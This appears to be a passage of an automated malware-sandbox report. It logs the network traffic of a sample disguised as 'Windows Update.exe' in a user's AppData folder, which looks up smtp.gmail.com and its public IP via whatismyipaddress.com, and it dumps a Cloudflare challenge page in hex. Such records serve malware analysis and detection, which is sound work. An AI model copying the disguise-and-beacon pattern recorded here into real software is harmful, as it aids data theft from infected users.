                                                                                                                  Mar 22, 2022 03:35:51.583343983 CET8.8.8.8192.168.2.40x6013No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:13.895982027 CET8.8.8.8192.168.2.40xfeaaName error (3)140.244.14.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:14.345383883 CET8.8.8.8192.168.2.40xadccNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:14.345383883 CET8.8.8.8192.168.2.40xadccNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:14.475357056 CET8.8.8.8192.168.2.40x107aNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:14.475357056 CET8.8.8.8192.168.2.40x107aNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                                  Mar 22, 2022 03:36:18.791414976 CET8.8.8.8192.168.2.40xbc04No error (0)smtp.gmail.com108.177.127.109A (IP address)IN (0x0001)

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • whatismyipaddress.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.449770104.16.155.36443C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.449779104.16.155.36443C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.449769104.16.155.3680C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Mar 22, 2022 03:35:49.565628052 CET1104OUTGET / HTTP/1.1
                                                                                                                  Host: whatismyipaddress.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Mar 22, 2022 03:35:49.603715897 CET1105INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Tue, 22 Mar 2022 02:35:49 GMT
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: max-age=3600
                                                                                                                  Expires: Tue, 22 Mar 2022 03:35:49 GMT
                                                                                                                  Location: https://whatismyipaddress.com/
                                                                                                                  Set-Cookie: __cf_bm=53QQMXpMPcCLJhnrIhd4uQwKhvaVHuWdUaSUkQg8t4I-1647916549-0-AUj7mvNv//2DvTFG4Z2Izur5CTRXly0PLgi+Eoke1sPCjDbZRbjgA0S1wra+DbdqzomCsUSjeQ9lMSr7AJQww78=; path=/; expires=Tue, 22-Mar-22 03:05:49 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 6efb8942dde4917d-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.2.449778104.16.155.3680C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Mar 22, 2022 03:36:14.415174961 CET1174OUTGET / HTTP/1.1
                                                                                                                  Host: whatismyipaddress.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Mar 22, 2022 03:36:14.441380978 CET1175INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Tue, 22 Mar 2022 02:36:14 GMT
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: max-age=3600
                                                                                                                  Expires: Tue, 22 Mar 2022 03:36:14 GMT
                                                                                                                  Location: https://whatismyipaddress.com/
                                                                                                                  Set-Cookie: __cf_bm=4UcEFWn2A0cXPWmi9m4gedKGvZ4R41yYQP961Y5orhY-1647916574-0-AdqrTQrrEaUMa8pC2Ntu4bvgq2aGdo0Y8pidThm2inGzesessW4gsye/bsITcXYt2CUpVvXr7H1h6Rf/nUzG1WI=; path=/; expires=Tue, 22-Mar-22 03:06:14 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 6efb89de28039974-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.449770104.16.155.36443C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2022-03-22 02:35:50 UTC0OUTGET / HTTP/1.1
                                                                                                                  Host: whatismyipaddress.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2022-03-22 02:35:50 UTC0INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Tue, 22 Mar 2022 02:35:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  CF-Chl-Bypass: 1
                                                                                                                  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                  Set-Cookie: __cf_bm=3T2zMhWJGUJiFvFygp4Ze35_fGFAV8AUcX3bmxdV52o-1647916550-0-AY8ARkBKAY0npUTkZLgdxWJqOZhqmSjbY7aXc+zs0c6A/7TMhypnyvrbA2CHANpeBLYSTVgqKfJygLjIYrQUBFI=; path=/; expires=Tue, 22-Mar-22 03:05:50 GMT; domain=.whatismyipaddress.com; HttpOnly; Secure
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 6efb89487ef75c7a-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  2022-03-22 02:35:50 UTC1INData Raw: 33 33 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                  Data Ascii: 33b1<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                  2022-03-22 02:35:50 UTC1INData Raw: 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 74 69 74 6c 65 3e 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 69 64 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22
                                                                                                                  Data Ascii: o-js" lang="en-US"> ...<![endif]--><head><title>Please Wait... | Cloudflare</title> <meta name="captcha-bypass" id="captcha-bypass" /><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="
                                                                                                                  2022-03-22 02:35:50 UTC2INData Raw: 47 7a 4e 42 31 45 22 2c 0a 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 22 62 22 2c 0a 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 22 31 30 30 30 22 2c 0a 20 20 20 20 20 20 20 20 63 4c 74 3a 20 22 6e 22 2c 0a 20 20 20 20 20 20 20 20 63 52 71 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 72 75 3a 20 22 61 48 52 30 63 48 4d 36 4c 79 39 33 61 47 46 30 61 58 4e 74 65 57 6c 77 59 57 52 6b 63 6d 56 7a 63 79 35 6a 62 32 30 76 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 61 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 6d 3a 20 22 52 30 56 55 22 2c 0a 20 20 20 20 20 20 20 20 20 20 64 3a 20 22 58 30 51 56 7a 47 56 31 36 51 4e 58 35 5a 70 65 70 6c 68 62 76 6c 46 70 79 51 72 50 36 41 70 4d 4f 59 46 4c 78 4f 51 51 75 31 30 2f 39 51 65 68 65 6d 65 6c 62 76 6a
                                                                                                                  Data Ascii: GzNB1E", cFPWv: "b", cTTimeMs: "1000", cLt: "n", cRq: { ru: "aHR0cHM6Ly93aGF0aXNteWlwYWRkcmVzcy5jb20v", ra: "", rm: "R0VU", d: "X0QVzGV16QNX5ZpeplhbvlFpyQrP6ApMOYFLxOQQu10/9Qehemelbvj
                                                                                                                  2022-03-22 02:35:50 UTC4INData Raw: 3a 36 39 70 78 3b 20 6d 61 72 67 69 6e 3a 20 20 61 75 74 6f 3b 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 66 2d 70 6c 65 61 73 65 2d 77 61 69 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 20 20 2e 61 74 74 72 69 62 75 74 69 6f 6e 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 32 70 78 3b 7d 0a 20 20 2e 62 75 62 62 6c 65 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 38 32 32 30 3b 20 77 69 64 74 68 3a 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 32 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 25 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 68 61 6c 6c 65 6e 67 65 2d 66
                                                                                                                  Data Ascii: :69px; margin: auto;} #cf-wrapper #cf-please-wait{text-align:center} .attribution {margin-top: 32px;} .bubbles { background-color: #f58220; width:20px; height: 20px; margin:2px; border-radius:100%; display:inline-block; } #cf-wrapper #challenge-f
                                                                                                                  2022-03-22 02:35:50 UTC5INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 20 63 66 2d 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 68 69 67 68 6c 69 67 68 74 2d 69 6e 76 65 72 73 65 20 63 66 2d 66 6f 72 6d 2d 73 74 61 63 6b 65 64
                                                                                                                  Data Ascii: <div class="cf-section cf-highlight cf-captcha-container"> <div class="cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <div class="cf-highlight-inverse cf-form-stacked
                                                                                                                  2022-03-22 02:35:50 UTC6INData Raw: 30 78 56 7a 73 4a 43 48 78 39 65 56 74 48 78 42 4e 45 36 6e 34 66 5a 50 72 32 39 70 57 47 50 79 42 56 4f 55 6f 79 36 66 54 57 30 70 6e 68 50 48 74 6b 46 5a 53 66 65 6f 35 5a 34 52 32 4f 56 75 64 56 69 71 39 71 57 76 7a 4d 59 6d 69 74 70 6c 73 58 53 78 61 59 7a 57 31 4a 69 68 5a 35 50 61 72 34 58 36 63 5f 4c 4d 46 36 31 57 34 77 4d 75 69 6f 62 59 46 63 2d 52 76 30 68 4f 64 57 67 43 49 2d 4b 4c 43 6b 31 71 53 61 33 6b 67 41 30 44 43 74 42 6f 69 37 52 59 74 38 65 4d 54 52 2d 69 52 35 56 7a 30 58 38 56 54 74 35 4e 6d 7a 6d 65 4c 53 64 51 4d 74 78 4c 7a 61 75 69 63 72 76 39 66 45 69 55 49 73 4c 39 56 7a 5f 4b 30 49 61 63 45 58 4b 6d 79 2d 39 70 4f 62 4e 56 79 48 37 4e 6a 51 54 4d 5f 63 52 63 66 49 4b 4d 39 6e 79 4c 6f 53 4a 43 6f 32 48 4a 63 2d 63 2d 33 33 78
                                                                                                                  Data Ascii: 0xVzsJCHx9eVtHxBNE6n4fZPr29pWGPyBVOUoy6fTW0pnhPHtkFZSfeo5Z4R2OVudViq9qWvzMYmitplsXSxaYzW1JihZ5Par4X6c_LMF61W4wMuiobYFc-Rv0hOdWgCI-KLCk1qSa3kgA0DCtBoi7RYt8eMTR-iR5Vz0X8VTt5NmzmeLSdQMtxLzauicrv9fEiUIsL9Vz_K0IacEXKmy-9pObNVyH7NjQTM_cRcfIKM9nyLoSJCo2HJc-c-33x
                                                                                                                  2022-03-22 02:35:50 UTC8INData Raw: 35 78 67 6d 51 62 74 46 43 2f 6c 38 45 79 48 6e 73 75 38 49 41 2f 4d 76 44 52 42 36 30 65 6d 79 50 69 55 76 48 2b 7a 43 31 71 42 68 38 34 67 35 5a 7a 42 33 71 38 43 61 39 42 71 50 70 33 69 79 67 52 2f 50 4b 30 4f 33 73 51 74 65 4a 31 73 4f 41 75 71 46 58 43 55 47 36 58 37 37 55 57 2f 6e 62 68 61 4e 79 65 2f 63 6e 43 74 51 54 7a 54 64 36 2b 43 39 77 59 32 4d 5a 35 76 67 4d 36 44 2b 46 68 74 58 59 6e 30 68 43 71 68 72 50 74 5a 2b 71 39 33 51 66 59 51 54 4d 57 38 6f 74 74 48 61 79 4c 35 48 4a 42 50 79 50 6b 6a 33 4c 64 35 37 39 61 64 4a 66 2b 77 42 42 78 55 7a 30 59 42 51 72 51 79 69 51 34 63 68 6f 74 32 63 61 66 78 31 50 36 70 64 76 45 4b 4b 57 59 4e 4d 65 58 74 32 62 32 57 36 76 57 62 59 57 55 30 5a 77 2b 62 37 30 70 79 37 33 4a 62 77 61 47 79 55 76 41 4e
                                                                                                                  Data Ascii: 5xgmQbtFC/l8EyHnsu8IA/MvDRB60emyPiUvH+zC1qBh84g5ZzB3q8Ca9BqPp3iygR/PK0O3sQteJ1sOAuqFXCUG6X77UW/nbhaNye/cnCtQTzTd6+C9wY2MZ5vgM6D+FhtXYn0hCqhrPtZ+q93QfYQTMW8ottHayL5HJBPyPkj3Ld579adJf+wBBxUz0YBQrQyiQ4chot2cafx1P6pdvEKKWYNMeXt2b2W6vWbYWU0Zw+b70py73JbwaGyUvAN
                                                                                                                  2022-03-22 02:35:50 UTC9INData Raw: 65 3d 22 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 22 3e 50 6c 65 61 73 65 20 74 75 72 6e 20 4a 61 76 61 53 63 72 69 70 74 20 6f 6e 20 61 6e 64 20 72 65 6c 6f 61 64 20 74 68 65 20 70 61 67 65 2e 3c 2f 68 31 3e 0a 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6e 6f 2d 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 63 6c 61 73 73 3d 22 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 62 64 32 34
                                                                                                                  Data Ascii: e="color:#bd2426;">Please turn JavaScript on and reload the page.</h1> </noscript> <div id="no-cookie-warning" class="cookie-warning" data-translate="turn_on_cookies" style="display:none"> <p data-translate="turn_on_cookies" style="color:#bd24
                                                                                                                  2022-03-22 02:35:50 UTC10INData Raw: 69 62 75 74 65 28 22 61 6c 74 22 2c 20 22 22 29 3b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 72 6b 6a 73 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 70 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 62 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 6d 61 6e 61 67 65 64 2f 76 31 3f 72 61 79 3d 36 65 66 62 38 39 34 38 37 65 66 37 35 63 37 61 22 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20
                                                                                                                  Data Ascii: ibute("alt", ""); document.body.appendChild(trkjs); var cpo=document.createElement('script'); cpo.type='text/javascript'; cpo.src="/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=6efb89487ef75c7a";
                                                                                                                  2022-03-22 02:35:50 UTC12INData Raw: 76 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 64 6f 20 49 20 68 61 76 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 61 20 43 41 50 54 43 48 41 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65
                                                                                                                  Data Ascii: v> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="why_captcha_headline">Why do I have to complete a CAPTCHA?</h2> <p data-translate
                                                                                                                  2022-03-22 02:35:50 UTC13INData Raw: 65 66 37 35 63 37 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 59 6f 75 72 20 49 50 3c 2f 73 70 61 6e 3e 3a 20 31 30 32 2e 31 32 39 2e 31 34 33 2e 39 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61
                                                                                                                  Data Ascii: ef75c7a</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 102.129.143.93</span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span cla
                                                                                                                  2022-03-22 02:35:50 UTC14INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.449779104.16.155.36443C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2022-03-22 02:36:16 UTC14OUTGET / HTTP/1.1
                                                                                                                  Host: whatismyipaddress.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2022-03-22 02:36:16 UTC14INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Tue, 22 Mar 2022 02:36:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  CF-Chl-Bypass: 1
                                                                                                                  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                  Set-Cookie: __cf_bm=hUhD2UdX9KkVERfiV5SDQBrwmWvqrKnJHnrZS9gL4WQ-1647916576-0-Af8AuUM/CWRh6nfYYBFJyHJJ4OBNTTTEmP62nrYSdhQuKojNAEw1zeh8LNsfpa7olf2S2L1utyAPIOltIVpa2lM=; path=/; expires=Tue, 22-Mar-22 03:06:16 GMT; domain=.whatismyipaddress.com; HttpOnly; Secure
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 6efb89ea99529064-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  2022-03-22 02:36:16 UTC15INData Raw: 33 33 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                  Data Ascii: 339c<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                  2022-03-22 02:36:16 UTC15INData Raw: 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 74 69 74 6c 65 3e 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 69 64 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22
                                                                                                                  Data Ascii: o-js" lang="en-US"> ...<![endif]--><head><title>Please Wait... | Cloudflare</title> <meta name="captcha-bypass" id="captcha-bypass" /><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="
